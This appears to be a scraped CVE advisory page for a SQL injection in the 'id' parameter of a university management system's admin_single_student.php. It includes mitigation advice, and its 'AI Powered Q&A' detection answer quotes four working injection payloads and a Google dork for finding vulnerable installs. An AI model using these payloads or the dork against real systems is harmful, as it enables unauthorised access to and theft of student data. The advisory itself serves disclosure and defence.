CVE-2026-3413
SQL Injection in itsourcecode University Management System Admin Module
Publication date: 2026-03-02
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| angeljudesuarez | university_management_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': "CVE-2026-3413 is a critical SQL injection vulnerability in the itsourcecode University Management System version 1.0, specifically in the file /admin_single_student.php. The flaw occurs because the 'id' parameter is not properly validated or sanitized, allowing attackers to inject malicious SQL code."}, {'type': 'paragraph', 'content': 'Exploiting this vulnerability enables attackers to manipulate SQL queries remotely without authentication, potentially gaining unauthorized access to the database, retrieving sensitive information, modifying or deleting data, and compromising the system.'}] [1, 2, 3]
How can this vulnerability impact me? :
[{'type': 'paragraph', 'content': 'This vulnerability can have serious impacts including unauthorized database access, data leakage, data modification or deletion, and potentially full system compromise or service disruption.'}, {'type': 'list_item', 'content': 'Attackers can retrieve sensitive information from the database.'}, {'type': 'list_item', 'content': 'Data integrity can be compromised by unauthorized modification or deletion of records.'}, {'type': 'list_item', 'content': "The system's availability may be affected, leading to service disruption."}, {'type': 'list_item', 'content': 'No authentication is required to exploit this vulnerability, increasing the risk.'}] [1, 2, 3]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': "This SQL injection vulnerability can be detected by testing the 'id' parameter in the /admin_single_student.php file for SQL injection flaws."}, {'type': 'paragraph', 'content': 'Proof-of-concept payloads include various SQL injection techniques such as boolean-based blind, error-based, time-based blind, and UNION query injections.'}, {'type': 'list_item', 'content': "Boolean-based blind payload example: id=123456' AND 7955=7955 AND 'foPK'='foPK"}, {'type': 'list_item', 'content': "Error-based payload example: id=123456' OR (SELECT 9080 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(9080=9080,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VUfE'='VUfE"}, {'type': 'list_item', 'content': "Time-based blind payload example: id=123456' AND (SELECT 5905 FROM (SELECT(SLEEP(5)))ErHA) AND 'IsOV'='IsOV"}, {'type': 'list_item', 'content': "UNION query payload example: id=123456' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7671,0x4758496b426561576e72596f5569746b5a6e7846414d4a5262427a5654506e684a5265496e455068,0x71766b7071),NULL,NULL,NULL-- -"}, {'type': 'paragraph', 'content': 'Testing can be automated using tools like sqlmap to confirm the presence of the vulnerability.'}, {'type': 'paragraph', 'content': 'Additionally, vulnerable targets can be identified using Google dorking with the query: inurl:admin_single_student.php'}] [2, 3]
What immediate steps should I take to mitigate this vulnerability?
[{'type': 'paragraph', 'content': 'Immediate mitigation steps include:'}, {'type': 'list_item', 'content': 'Use prepared statements with parameter binding to separate SQL code from user input, preventing SQL injection.'}, {'type': 'list_item', 'content': 'Implement strict input validation and filtering to ensure inputs conform to expected formats.'}, {'type': 'list_item', 'content': "Minimize database user permissions by avoiding the use of high-privilege accounts like 'root' or 'admin' for routine operations."}, {'type': 'list_item', 'content': 'Conduct regular security audits of code and systems to detect and address vulnerabilities promptly.'}, {'type': 'paragraph', 'content': 'If possible, consider replacing the affected component with an alternative product as no known countermeasures or official patches have been reported.'}] [2, 3]